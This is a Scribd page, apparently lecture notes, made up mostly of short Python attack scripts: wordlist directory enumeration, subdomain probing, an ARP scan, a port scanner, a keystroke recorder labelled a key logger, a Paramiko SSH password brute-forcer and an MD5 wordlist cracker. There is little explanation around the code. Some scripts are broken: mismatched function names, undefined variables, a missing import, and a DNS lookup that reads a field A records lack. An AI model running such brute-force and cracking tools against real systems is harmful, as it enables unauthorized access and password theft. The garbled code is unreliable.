Scribd Logo
Upload

Welcome to Scribd!

  • 37 views

    Lecture 9 Python Script

    Uploaded by

    Max Riddle
    The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd

    Lecture 9 Python Script

    Uploaded by

    Max Riddle
    37 views5 pages
    The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

    Original Title

    Lecture 9 Python script

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    37 views5 pages

    Lecture 9 Python Script

    Uploaded by

    Max Riddle
    The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Download as docx, pdf, or txt
    You are on page 1of 5

    Python script that performs directory enumeration on a

    web server using a wordlist


    import requests
    import sys
    sub_list = open("wordlist.txt").read()
    directories = sub_list.splitlines()
    for dir in directories:
    dir_enum = f"http://{sys.argv[1]}/{dir}.html"
    r = requests.get(dir_enum)
    if r.status_code==404:
    pass
    else:
    print("Valid directory:" ,dir_enum)

    script attempts to enumerate subdomains by resolving


    DNS records and then checks if these subdomains are
    accessible over HTTP.
    import dns.resolver
    import sys
    def enumerate_subdomains(base_domain):
    subdomains = []
    try:
    answers = dns.resolver.resolve(base_domain, 'A')
    for rdata in answers:
    subdomains.append(rdata.target)
    except dns.resolver.NXDOMAIN:
    print(f"No DNS record found for {base_domain}")
    return subdomains

    if len(sys.argv) != 2:
    print("Usage: python script.py <base_domain>")
    sys.exit(1)

    base_domain = sys.argv[1]
    subdomains = enumerate_subdomains(base_domain)

    for sub in subdomains:


    sub_domain = f"http://{sub}"
    try:
    response = requests.get(sub_domain)
    if response.status_code == 200:
    print("Valid domain:", sub_domain)
    except requests.ConnectionError:
    pass

    script appears to enumerate directories by checking if


    specific URLs are valid based on the HTTP response code
    import requests
    import sys

    def enumerate_directories(base_url, directory_list):


    valid_directories = []

    for directory in directory_list:


    dir_url = f"{base_url}/{directory}.html"
    response = requests.get(dir_url)

    if response.status_code != 404:
    valid_directories.append(dir_url)

    return valid_directories

    if len(sys.argv) != 2:
    print("Usage: python script.py <base_url>")
    sys.exit(1)

    base_url = sys.argv[1]

    directory_list = open("wordlist.txt").read().splitlines()
    valid_directories = enumerate_directories(base_url, directory_list)

    for valid_dir in valid_directories:


    print("Valid directory:", valid_dir)

    Scapy to perform an ARP scan within a specified IP range


    from scapy.all import *

    interface = "eth0"
    ip_range = "10.10.X.X/24"
    broadcastMac = "ff:ff:ff:ff:ff:ff"

    packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range)

    ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

    for send,receive in ans:


    print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

    Port Scanner
    import sys
    import socket
    def probeport(ip, port, result = 1):
    try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(0.5)
    r = sock.connect_ex((ip, port))
    if r == 0:
    result = r
    sock.close()
    except Exception as e:
    pass
    return result

    for port in ports:


    sys.stdout.flush()
    response = probe_port(ip, port)
    if response == 0:
    open_ports.append(port)

    if open_ports:
    print ("Open Ports are: ")
    print (sorted(open_ports))
    else:
    print ("Looks like no ports are open :(")
    ip = '192.168.1.6'
    open_ports =[]

    ports = range(1, 65535)

    ports = { 137, 139, 23, 53, 80, 135, 443, 445}

    Key Logger
    import keyboard
    keys = keyboard.record(until ='ENTER')
    keyboard.play(keys)

    bruteforce an SSH server using the Paramiko library in Python


    import paramiko

    target = str(input('Please enter target IP address: '))


    username = str(input('Please enter username to bruteforce: '))
    password_file = str(input('Please enter location of the password file: '))

    def ssh_connect(password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
    ssh.connect(target, port=22, username=username, password=password)
    print('Password found: ' + password)
    return True
    except paramiko.AuthenticationException:
    print('Incorrect password: ' + password)
    return False
    except Exception as e:
    print(e)
    finally:
    ssh.close()

    with open(password_file, 'r') as file:


    for line in file.readlines():
    password = line.strip()
    if ssh_connect(password):
    exit(0)

    print('Password not found in the provided wordlist.')

    script to crack an MD5 hash using a wordlist


    import hashlib

    wordlist_location = str(input('Enter wordlist file location: '))


    hash_input = str(input('Enter hash to be cracked: '))

    with open(wordlist_location, 'r') as file:


    for line in file.readlines():
    hash_ob = hashlib.md5(line.strip().encode())
    hashed_pass = hash_ob.hexdigest()
    if hashed_pass == hash_input:
    print('Found cleartext password! ' + line.strip())
    exit(0)

    You might also like

    pFad - Phonifier reborn

    Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

    Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


    Alternative Proxies:

    Alternative Proxy

    pFad Proxy

    pFad v3 Proxy

    pFad v4 Proxy